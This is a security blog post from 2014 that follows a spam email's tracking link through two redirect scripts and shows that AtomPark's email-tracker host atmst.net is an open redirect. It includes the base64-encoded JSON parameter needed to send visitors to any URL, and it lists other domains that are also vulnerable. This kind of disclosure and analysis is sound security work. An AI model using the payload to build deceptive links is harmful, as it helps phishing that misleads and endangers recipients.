AverageSecurityGuy

Security, Programming, Pentesting

About

Mastodon

Linked In

Projects

Cheat Sheets

Book

23 September 2014

Analysis of a Spam Link

by {"login"=>"averagesecurityguy", "email"=>"stephen@averagesecurityguy.info", "display_name"=>"averagesecurityguy", "first_name"=>"", "last_name"=>""}

This weekend I received a spam message that wanted to sell me tickets to a comedy show in Louisville, KY. This spam message caught my eye because it made it past Google's spam filters and I'm planning to go to Derbycon in Louisville next week. I decided to explore the link in the email a bit and see what I could find.

The original link sent in the email was this.

http://www.emergingcomics.com/special.php?j=eyJ1IjoiRDk1QUI
0RUQzODAzRjVBOTU3NDJDQzE5NEUzQzEzOTIiLCJpIjoiQU1BWk9OJTIwU0
VTIiwiciI6ImciLCJ0IjoiYUp0Zml0aEhRUHRzUXV0YXRFeHNvSkZ1eEZEb
2h5ZyIsImwiOiJodHRwJTNBJTJGJTJGJTIwZ29vLmdsJTJGQTdYT0pIIiwi
diI6IjguNjkuMC4xNjEifQ==&r=0.720967122353613

The first thing I noticed was the base64 encoded data in the "j" parameter. I decoded the data and got the following JSON object. 

{"u":"D95AB4ED3803F5A95742CC194E3C1392","i":"AMAZON%20SES",
"r":"g","t":"aJtfithHQPtsQutatExsoJFuxFDohyg","l":"http%3A%
2F%2F%20goo.gl%2FA7XOJH","v":"8.69.0.161"}

Looking at the "l" key in the JSON object, I decided the special.php page was probably a redirect script so I opened the link using curl -I to get the headers.

HTTP/1.1 302 Moved Temporarily
Date: Mon, 22 Sep 2014 17:37:27 GMT
Server: Apache mod_fcgid/2.3.10-dev
X-Powered-By: PHP/5.4.31
Location: http://atmst.net/utr64.php?j=eyJ1IjoiRDk1QUI0RUQz
ODAzRjVBOTU3NDJDQzE5NEUzQzEzOTIiLCJpIjoiQU1BWk9OJTIwU0VTIiw
iciI6ImciLCJ0IjoiYUp0Zml0aEhRUHRzUXV0YXRFeHNvSkZ1eEZEb2h5Zy
IsImwiOiJodHRwJTNBJTJGJTJGJTIwZ29vLmdsJTJGQTdYT0pIIiwidiI6I
jguNjkuMC4xNjEifQ%3D%3D
Content-Type: text/html

Sure enough, the special.php page gave me a 302 response and sent me to atmst.net/utr.php. I also noticed that the base64 data in the "j" parameter was passed to this new page but was URL encoded.

I again used curl -I to get the page at atmst.net assuming it was a redirect script as well.

HTTP/1.1 302 Found
Server: nginx/1.0.4
Date: Mon, 22 Sep 2014 17:39:29 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.17
Location: http:// goo.gl/A7XOJH
Cache-Control: max-age=259200
Expires: Thu, 25 Sep 2014 17:39:29 GMT

Once again, I've been redirected, this time to the URL referenced in the "l" key in the base64 encoded JSON object.

After doing a bit of research on atmst.net I found that it is used by AtomPark Software as part of its Atomic Email Tracker software. I'm not sure what all of the keys in the JSON object represent but based on the information here, hxxp://www.massmailsoftware.com/tracker/integration.htm the "u" key is most likely the MD5 hash of the email address of the user account.

I decided to play around with the parameters a bit and see if all of the parameters were required for the redirect to be successful.

With the exception of the "l" key, I replaced all of the values in the JSON object with the letter "a." For the "l" key I changed the URL to http%3A%2F%2F%20arbitrary.test so that my JSON object now looked like this.

{"u":"a","i":"a","r":"g","t":"a","l":"http%3A%2F%2F%20arbit
rary.test","v":"a"}

I then base64 encoded the JSON object and once again used curl -I to see what would happen.

curl -I http://atmst.net/utr64.php?j=eyJ1IjoiYSIsImkiOiJhIi
wiciI6ImciLCJ0IjoiYSIsImwiOiJodHRwJTNBJTJGJTJGJTIwYXJiaXRyY
XJ5LnRlc3QiLCJ2IjoiYSJ9

HTTP/1.1 302 Found
Server: nginx/1.0.4
Date: Mon, 22 Sep 2014 17:45:49 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.17
Location: http:// arbitrary.test
Cache-Control: max-age=259200
Expires: Thu, 25 Sep 2014 17:45:49 GMT

This time I was redirected to the URL I chose but I did not have to provide a valid user id. This shows the atmst.net server is an open redirect. Further testing showed that only the "r" and "l" keys were required in the JSON object and that it was not necessary to URL encode the target URL.

So if we base64 encode the following JSON object and pass it as the "j" parameter to atmst.net/utr64.php we will be redirected to google.com

{"r":"g","l":"http://google.com"}

Further research found two other domains run by the same company that are also vulnerable to the open redirect.

atrstat.com
etrstat.com
atmst[1-5].net

tags: